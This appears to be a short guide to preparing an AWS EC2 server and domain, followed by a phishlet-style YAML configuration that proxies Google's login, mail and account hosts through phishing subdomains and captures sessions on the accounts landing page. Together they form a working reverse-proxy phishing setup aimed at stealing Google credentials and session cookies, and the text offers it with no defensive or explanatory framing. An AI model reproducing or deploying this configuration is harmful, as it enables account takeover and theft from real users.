- Have an AWS Account
- Spin up an EC2 Instance of Ubuntu Server and Make sure that your instance's security groups allow incoming connections on TCP ports 22 and 3000
- Use an Elastic IP to bind your Instance to it --- You would not be paying for this -- Till the time the EC2 Instance is running
- Add the IP Allocated to your A Record --- with your registrar
- Have a SSH Connection to your EC2 Instance with the Key Pairs
- Connect to the EC2 Instance
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name: 'google' | |
author: '@ewhit' | |
min_ver: '2.3.0' | |
proxy_hosts: | |
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true} | |
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false} | |
- {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false} | |
- {phish_sub: 'gstatic', orig_sub: 'gstatic', domain: 'gstatic.com', session: true, is_landing: false} | |
- {phish_sub: 'mail', orig_sub: 'mail', domain: 'google.com', session: false, is_landing: false} | |
- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false} |